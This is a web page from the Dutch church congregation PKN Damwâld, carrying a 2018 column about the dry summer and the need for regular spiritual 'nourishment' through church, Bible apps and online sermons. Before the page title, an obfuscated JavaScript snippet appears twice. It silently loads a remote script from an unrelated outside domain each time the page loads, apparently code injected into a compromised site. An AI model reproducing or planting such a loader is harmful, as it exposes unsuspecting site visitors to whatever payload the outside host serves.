;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vruchtbare grond - PKN Damwâld

Vruchtbare grond

Gepubliceerd op: zaterdag 11 augustus 2018

Wat hebben we een zomer! Uitzonderlijk, al een aantal maanden lang is het warm en vooral droog. Nu is dat voor de één vervelender dan voor de ander. De campings en terrassen draaien topdagen en de Nederlanders blijven massaal in eigen land tijdens de vakantieperiode, de kinderen spelen met water en iedereen zit lekker tot ’s avonds laat in de tuin.

De boeren hebben het lastig, gewassen die niet aanslaan, grasland dat verdort en op plaatsen ook nog een beregeningsverbod. De droogte zorgt voor meer risico op branden, iets wat we ook veel zien en horen op de tv, en soms ervaren dichterbij huis. En de laatste dag(en) valt er dan ineens heel veel water in een paar uren tijd, wat ook weer tot overlast leidt, hier en in het buitenland.

Nu is het in de zomerperiode ook vaak een periode waarin we wat minder vaak naar de kerk gaan, doordat we een aantal weken in het buitenland zitten, of anderszins op pad zijn. Dat zorgt voor een andere droogte, een gebrek aan ‘kerkelijke voeding’. Het is nog altijd zo, dat alles het beste groeit op vruchtbare grond, dus met voldoende vocht, zonlicht en een goede bodem. Dat geldt net zo voor ons geloof. Ook dat vraagt om regelmatige toevoer van voeding. Want de boodschap horen of lezen, is er over nadenken. En daar vervolgens iets mee doen, eruit leven.

Dus probeer ook in de zomer regelmatig op zoek te gaan naar die boodschap. Dat kan heel simpel, je kunt tegenwoordige de Bijbel al als app op je telefoon zetten, of via de kerkelijke website de preek op afstand terugluisteren of lezen. Op die manier voorkom je een lange periode van ‘droogte’ en blijven we ook in de zomer bezig met ons geloof. Want die werkt het beste, als ze landt in vruchtbare grond.

Fijne zomer!

 

Rechtenvrije afbeelding / met dank aan de auteur: <a href=’https://nl.freepik.com/vrije-photo/fantastische-scene-met-mooie-plant_1077711.htm’>Designed by Freepik</a

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns